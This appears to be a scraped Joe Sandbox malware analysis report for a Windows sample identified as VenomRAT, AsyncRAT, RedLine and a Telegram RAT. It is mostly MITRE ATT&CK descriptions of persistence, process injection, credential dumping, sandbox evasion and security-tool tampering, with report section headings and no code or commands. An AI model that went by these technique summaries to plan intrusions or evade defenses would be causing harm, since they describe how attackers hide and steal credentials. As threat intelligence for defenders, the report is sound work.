Source File: 0000000A.00000002.2908665172.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5710000_4BC4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0458e98cd368d082cc4bf049b6db1e8507c9fa11a0f8b18b6cbc057213b088f4
Instruction ID: 2da6d948a1f84f15e29eb9e37270ca4e83956ab111eb6bc20320c8b041ea81d3
Opcode Fuzzy Hash: 0458e98cd368d082cc4bf049b6db1e8507c9fa11a0f8b18b6cbc057213b088f4
Instruction Fuzzy Hash: F8E0D83474610DAFC754EFB8D414B5E77FAEB86300F505869940AE3390DE395E41D78A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xj40xovMsm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VenomRAT

Threatname: Telegram RAT

Threatname: AsyncRAT

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

Protection of GUI

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Windows Analysis Report
xj40xovMsm.exe

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre